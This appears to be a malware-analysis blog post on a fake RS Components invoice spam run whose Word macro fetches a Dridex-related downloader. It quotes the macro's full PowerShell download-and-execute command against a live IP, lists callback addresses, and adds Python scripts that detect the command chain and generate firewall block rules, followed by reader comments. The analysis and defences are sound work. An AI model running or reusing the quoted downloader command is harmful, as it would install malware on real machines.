---------------------------------------------------------------
From: Earlene Carlson
Date: 31 March 2015 at 11:30
Subject: 83433-Your Latest Documents from RS Components 659751716
Helping you get your job done. You've received this email as a customer of rswww.com.
Dear Customer, Please find attached your latest document(s) from RS.
For all account queries please contact RS Customer Account Services.
Tel: 01536 752867 Fax: 01536 542205 Email: rpdf.billing@colt.net (subject box to read DOC eBilling)
If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following:
Tel: 0333 8727520 Email: customers@colt.net
Kind regards, RS Customer Account Services.
This service is provided by Swiss Post Solutions on behalf of RS Components.
RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK. Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867.
---------------------------------------------------------------
The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).
There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe
For some reason, the EXE is downloaded from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.
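Each step of that command chain (an Office process spawning a shell, -ExecutionPolicy bypass, WebClient.DownloadFile from a bare IP address, an .exe saved under a .cab name, then expand and start out of %TEMP%) is something a process-creation log can be scored on. The following detector is an added example written for this post, not code from the blog or from any vendor; the event dictionaries, field names (parent, image, cmdline) and the two benign look-alike events are constructed here, and only the first command line is the one quoted above.

```python
import re

# Constructed sample process-creation events (hypothetical field names, modelled on
# an EDR/Sysmon-style record). The first command line is the one quoted in the post;
# the other two are benign look-alikes built here to show the scoring does not fire
# on them.
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": r"cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
                r"(New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); "
                r"expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
    {"parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": "cmd /c dir"},
]

OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SHELLS = {"cmd.exe", "powershell.exe"}

# One indicator per step of the chain the post describes.
INDICATORS = {
    # An Office document spawning a shell: the macro's entry point.
    "office_parent_spawns_shell":
        lambda e: e["parent"].upper() in OFFICE_APPS and e["image"].lower() in SHELLS,
    # Script-execution restrictions switched off on the command line.
    "execution_policy_bypass":
        lambda e: re.search(r"-executionpolicy\s+bypass", e["cmdline"], re.I),
    # WebClient.DownloadFile: payload fetched over HTTP.
    "webclient_downloadfile":
        lambda e: re.search(r"net\.webclient.*downloadfile", e["cmdline"], re.I),
    # Download URL is a bare IPv4 address rather than a hostname.
    "download_from_bare_ip":
        lambda e: re.search(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", e["cmdline"], re.I),
    # An .exe URL saved under a .cab name, the oddity the post points out.
    "exe_saved_as_cab":
        lambda e: re.search(r"downloadfile\('[^']+\.exe',\s*'[^']+\.cab'\)", e["cmdline"], re.I),
    # expand followed by start out of %TEMP%: the staged execution step.
    "temp_expand_then_start":
        lambda e: re.search(r"expand\s+%temp%.*start\s+%temp%", e["cmdline"], re.I),
}


def score_event(event):
    """Return the names of the indicators an event triggers."""
    return [name for name, check in INDICATORS.items() if check(event)]


def is_suspicious(event, threshold=2):
    """Flag an event when at least `threshold` independent indicators fire.

    A single indicator (an Office app starting cmd.exe) is common enough in
    normal use that it is only a weak signal on its own; two or more steps of
    the chain together are what mark this campaign.
    """
    return len(score_event(event)) >= threshold


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict = "SUSPICIOUS" if is_suspicious(ev) else "ok"
        print(verdict, ev["cmdline"][:60], score_event(ev))
```

The threshold keeps the third constructed event (Word running a harmless cmd /c dir) below the alert line while the quoted command trips all six indicators; tune the threshold and the indicator list to your own baseline of Office-to-shell activity.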
Analysis is still pending, but the VirusTotal report does indicate that the malware phones home to 188.120.225.17 (TheFirst-RU, Russia), which I strongly recommend blocking. Check back for more updates later.
UPDATE:
Automated analysis [1] [2] [3] [4] shows attempted connections to the following IPs:
188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)
It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.
Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169
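To put that blocklist to work, the small script below matches the listed addresses against connection logs and emits the equivalent outbound block rules. It is an added example, not part of the post: the addresses and their attributions are the ones given above (with the download host from the macro's URL added), while the log line format and the sample lines are constructed for the demonstration.

```python
import ipaddress
import re

# Indicators taken from the post: the recommended blocklist, plus the host the
# macro downloads its payload from. Descriptions are the post's own attributions.
BLOCKLIST = {
    "188.120.225.17": "attempted connection in sandbox (TheFirst-RU, Russia)",
    "1.164.114.195": "attempted connection in sandbox (Data Communication Business Group, Taiwan)",
    "2.194.41.9": "attempted connection in sandbox (Telecom Italia Mobile, Italy)",
    "46.19.143.151": "attempted connection in sandbox (Private Layer INC, Switzerland)",
    "199.201.121.169": "attempted connection in sandbox (Synaptica, Canada)",
    "185.91.175.64": "payload download host",
}

# Constructed firewall-log lines in a hypothetical key=value format; 192.0.2.10 is a
# documentation address standing in for ordinary traffic.
SAMPLE_LOG = """\
2015-03-31T11:41:02 src=10.0.0.15 dst=185.91.175.64 dport=80 proto=tcp action=allow
2015-03-31T11:41:09 src=10.0.0.15 dst=188.120.225.17 dport=443 proto=tcp action=allow
2015-03-31T11:41:10 src=10.0.0.15 dst=192.0.2.10 dport=443 proto=tcp action=allow
2015-03-31T11:41:12 src=10.0.0.15 dst=10.0.0.1 dport=53 proto=udp action=allow
"""

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def blocked_addresses():
    """Parse the blocklist into validated address objects.

    A typo in the list raises ValueError here instead of silently producing a
    rule that never matches.
    """
    return {ipaddress.ip_address(ip): why for ip, why in BLOCKLIST.items()}


def extract_ips(line):
    """Pull every syntactically valid IPv4 address out of a log line."""
    found = []
    for candidate in IPV4_RE.findall(line):
        try:
            found.append(ipaddress.ip_address(candidate))
        except ValueError:
            continue  # e.g. 999.1.1.1 inside a reference number, not an address
    return found


def match_log(text):
    """Return (line, ip, reason) for every log line touching a blocklisted address."""
    blocked = blocked_addresses()
    hits = []
    for line in text.splitlines():
        for ip in extract_ips(line):
            if ip in blocked:
                hits.append((line, str(ip), blocked[ip]))
    return hits


def windows_firewall_rules(name="Block RS Components spam IOCs"):
    """Outbound block rules in netsh advfirewall syntax, one per address."""
    return [
        f'netsh advfirewall firewall add rule name="{name}" dir=out action=block remoteip={ip}'
        for ip in BLOCKLIST
    ]


def iptables_rules():
    """Equivalent outbound DROP rules for a Linux gateway."""
    return [f"iptables -A OUTPUT -d {ip} -j DROP" for ip in BLOCKLIST]


if __name__ == "__main__":
    for line, ip, why in match_log(SAMPLE_LOG):
        print(f"HIT {ip} ({why}): {line}")
    print("\n".join(windows_firewall_rules()))
    print("\n".join(iptables_rules()))
```

Running the matcher over historical logs answers the question the comments raise (did anything talk to these hosts?), and the generated rules cover the same list on both Windows hosts and a Linux perimeter.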
6 comments:
I've just received this email as well, I have just deleted it - thanks.
I also received this email. I opened it as it was convincing however, I did not download the file attached. I am a mac user and was wondering if anything could have snuck on to my laptop??
Thank you for the heads up, I received this and nearly panicked, it is rather convincing.
You're saving computers, THANKS! This looked very convincing, almost clicked the attachment for more info.
Yup - spam e-mail just received. Having just placed a bona fide order from RSC I was expecting an invoice so this particular scam seems to be relying on less-observant purchasers of RS products and whoever it is presumably has access to the RS sales data. RD London
Hi,
Another address worth blocking is
185.91.175.64